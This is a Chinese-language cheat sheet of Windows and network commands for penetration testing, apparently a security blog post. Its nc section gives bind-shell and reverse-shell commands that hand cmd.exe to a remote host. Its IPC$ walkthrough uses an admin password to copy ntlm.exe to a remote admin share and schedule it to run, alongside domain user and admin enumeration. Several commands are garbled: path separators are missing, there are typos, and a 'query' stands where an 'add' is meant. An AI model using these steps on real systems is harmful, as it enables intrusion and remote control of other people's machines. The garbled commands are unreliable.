當前位置:
首頁 > 最新 > 滲透基礎——命令

滲透基礎——命令

NETSTAT

作用:顯示協議統計信息和當前TCP/IP網路連接

netstat -a 顯示所有連接和偵聽埠

netstat -ano 顯示所有連接和偵聽埠,以數字形式顯示進程ID

netstat -r 顯示路由表(等價於 route print)

netstat -f 顯示本機與外部連接(NT6.0以上)

netstat -b 擁有足夠許可權可以查看每個連接及偵聽埠所涉及的可執行程序

netstat -p TCP 查看連接中使用的協議

NBTSTAT

作用:顯示本地計算機和遠程計算機的基於TCP/IP(NetBT)協議的NetBIOS統計資料、NetBIOS名稱表和NetBIOS名稱緩存

NBTSTAT 格式:nbtstat [-a remotename] [-A ip address] [-c] [-n] [-R] [-RR] [-s][-S]

[interval]

nbtstat -acleanxp 列出指定名稱的遠程機器的名稱表

nbtstat -AIP 列出指定IP地址的遠程機器的名稱表

nbtstat -n 列出本地NetBIOS名稱

nbtstat -R 清除NetBIOS名稱緩存並重新裝載到本地 Lmhosts(c:windowssystem32driversetclmhosts.sam)

文件中 帶標記#PRE的項目

REG(winxp提供的,可以添加、更改和顯示註冊表項中的注冊表子項信息和值)

REG QUERY 查詢(顯示註冊表項setup下所有子項和值)

REG ADD 增加(添加註冊表項、值)

REG DELETE 刪除(刪除註冊表項及其所有子項和值)

REG COPY 拷貝(複製註冊表項及其子項)

REG SAVE 保存(將註冊表項保存到文件)

REG RESTORE 還原註冊表

REG LOAD 載入註冊表文件/項

REG UNLOAD 卸載配置單元的註冊表項

REG COMPARE 註冊表項比較

REG EXPORT 導出註冊表

REG IMPORT 導入註冊表

HKCR:HKEY_CLASSES_ROOT

基層類別鍵,用於定義系統中所有已經註冊的文件擴展名、文件類型、文件圖標等

HKCU:HKEY_CURRENT_USER

定義當前用戶的所有許可權

HKLM:HKEY_LOCAL_MACHINE

定義相對網路環境而言的本地計算機軟硬體的全部信息

HKU:HKEY_USERS

定義所用的用戶信息,其中部分分支將映射到HKEY_CUQQENT_USER關鍵字中,大部分設置都可以通過控制面板來修改

HKCC:HKEY_CURRENT_CONFIG

定義計算機的當前配置情況,實際上就是指向HKEY_LOCAL_MASHINEConfig 結構中的某個分支的指針

REGADD(將新的子項或項添加到註冊表中)

語法:red addkeyName [/v EntryName|/ve] [/t Data Type]

[/s separator] [/d value][/f]

參數:keyName

指定子項的完全路徑。有效子目錄樹為HKLM、HKCU、HKCR、HKU以及HKCC。遠程機器上只有HKLM和HKU

/V EntryName 指定要添加到指定子項下的項名稱

/ve 指定添加到註冊表中的項為空值

/t DataType 指定項值的數據類型

DataType可以是以下幾種類型:

REG-SZ

REG-MULTI-SZ

REG-DWORD-BIG-ENDIAN

REG-DWORD

REG-BINARY

REG-DWORD-LITTLE-ENDIAN

REG-LINK

REG-FULL-RESOURCE-DESCRIPTOR

REG-EXPAND-SZ

/s separator 指定用於分隔多個數據實例的字元

/d value 指定新註冊表項的值

/f 不用詢問信息而直接添加子項或項

/? 顯示幫助

REG QUERY(返回註冊表的子項下的項和下一層子項的列表)

語法:reg query keyName [{/v EntryName | /ve}][/s]

/v EntryName 返回特定的項及其值

/ve 指定僅返回為空值的項

/s 將返回各個層中的所有子項和項

查看註冊表遠程桌面的埠號

REG queryHKLMSYSTEMCurrentControlsetControlTerminal」 」ServerWinStationsRDP-TCP /v PortNumber

開啟3389

REG queryHKLMSYSTEMCurrentControlsetControlTerminal」 」Server /v fDenyTSconnections /t REG-DWORD /d 00000000 /f

修改埠為2008(0x7d8)

REG ADD HKLMSYSTEMCurrentControlsetControlTerminal」 」Serverwds
dpwdTds cp /vPortNumber /t REG-DWORD /d 0X7d8 /f

REG ADD HKLMSYSTEMCurrentControlsetControlTerminal」」ServerWinStationsRDP-TCP /vPortNumber /t REG-DWORD /d 0x7d8 /f

SC(用來與服務控制管理器和服務進行通信)

sc query/queryex 查詢服務的狀態/查詢服務的擴展狀態

scconfig 更改服務的配置

sc stop 向服務發送stop請求

sc delete (從註冊表中)刪除服務

sc start 啟動服務

sc pause 向服務發送PAUSE控制請求

sc continue 向服務發送CONTINUE控制請求

type:顯示文本文件內容

rar

-a 添加文件到壓縮文件

-e 解壓壓縮文件到當前目錄

-p[密碼] 設置密碼

壓縮: ① 【未加密】rar a F: est1.rar F: emp

② 【加密】 rar a -p password F: est1.rar F: emp

解壓: ① rar e F: est1.rar E: est

② rar e -ppassword F: est1.rar E: est

nc

網路安全界的「瑞士軍刀」,一個簡單而有用的工具,透過使用TCP或UDP協議的網路連接去讀寫數據

-l 監聽模式,用於入站連接

-w secs timeout的時間

-L 連接關閉後,仍然繼續監聽

-n 指定數字的IP地址,不能用hostname

-p port 本地埠號

-v 詳細輸出,用兩個-v可得到更詳細的內容

-z 將輸入輸出關掉,用於掃描時

①連接到遠程主機:

格式:nc -nvv 192.168.x.x 80

講解:連接 192.168.x.x的TCP 80埠

②監聽本地主機

格式:nc -l -vv -p 80

講解:監聽本機的TCP 80埠

③掃描遠程主機

格式:nc -nvv -w2 -z 192.168.x.x 80 -445

講解:掃描192.168.x.x的TCP 80到TCP 445的所有埠

④遠程主機綁定shell

格式:nc -l -p 5354 -t -e c:winntsystem32 cmd.exe

講解:綁定遠程主機的cmdshell 在遠程主機的TCP 5354埠

⑤遠程主機綁定shell並反向連接

格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354

講解:綁定遠程主機的cmdshell 並反向連接到192.168.x.x的TCP 5354埠

域命令

1、域內添加用戶

net user username pass /add/domain

2、域內禁用用戶

net userusername /active:no/domain

3、域內激活用戶

net user username /active:yes/domain

4、域內刪除用戶

net user username /del/domain

5、列出域內所有的機器名

desquery computer domainroot -limit 0

net group 「domain computers」 /domain

6、列出域內所有的用戶

dsquery user domainroot -limit 0

net user /domain

7、列出域內的內網劃分

dsquery subnet

8、列出域內的所有分組

dsquery group

net group /domain

9、列出域控制器(域控,DC)

dsquery server

net group 「domain controllers」 /domain

10、列出域管理員用戶

net group 「domain admins」 /domain

11、列出域列表

net view /domain

12、查看當前域活動機器列表

net view /domain:DC name

IPC$(依賴139 445埠)

場景:遠程機器192.168.123.123,用戶名為:administrator,密碼為:abc@123

(1)建立ipc$連接

net use \192.168.123.123ipc$ "abc@123" /user:administrator

(一定要注意:這一行命令中包含了3個空格)

(2)列遠程機器admin$目錄

dir \192.168.123.123admin$

(3)把本地的c:
tlm.exe文件拷貝到遠程的主機上

copyc:
tlm.exe \192.168.123.123admin$

(4)查看遠程機器時間

nettime \192.168.123.123

(5)在下一個時間點運行上傳的文件ntlm.exe(當前時間為:14:57)

at\192.168.123.123 15:00 ntlm.exe

(6)刪除遠程機器上ntlm.exe文件

del \192.168.123.123admin$
tlm.exe /f/q

(7)把對方的磁碟C映射為本地的Z盤

netuse z: \192.168.123.123c$

(8)刪除磁碟映射連接

netuse z: /del

(9)刪除IPC$連接

netuse \192.168.123.123ipc$ /del

netuse * /del

IPC$ 依賴哪些服務

開啟IPC$共享

啟動lanmanworkstations服務(顯示名:workstations)

啟動lanmanserver服務(顯示名:server)

啟動netlogon

打開139、445埠

Ipc$常見的錯誤代碼及原因

錯誤號5,拒絕訪問:很可能你使用的用戶不是管理員許可權的;

錯誤號51,Windows無法找到網路路徑:網路有問題;

錯誤號53,找不到網路路徑:ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(埠過濾);

錯誤號67,找不到網路名:你的lanmanworkstation服務未啟動或者目標刪除了ipc$;

錯誤號1219,提供的憑據與已存在的憑據集衝突:你已經和對方建立了一個ipc$,請刪除再連;

錯誤號1326,未知的用戶名或錯誤密碼:原因很明顯了;

錯誤號1792,試圖登錄,但是網路登錄服務沒有啟動:目標NetLogon服務未啟動;

錯誤號2242,此用戶的密碼已經過期:目標有帳號策略,強制定期要求更改密碼。


喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 WEB安全之路 的精彩文章:

TAG:WEB安全之路 |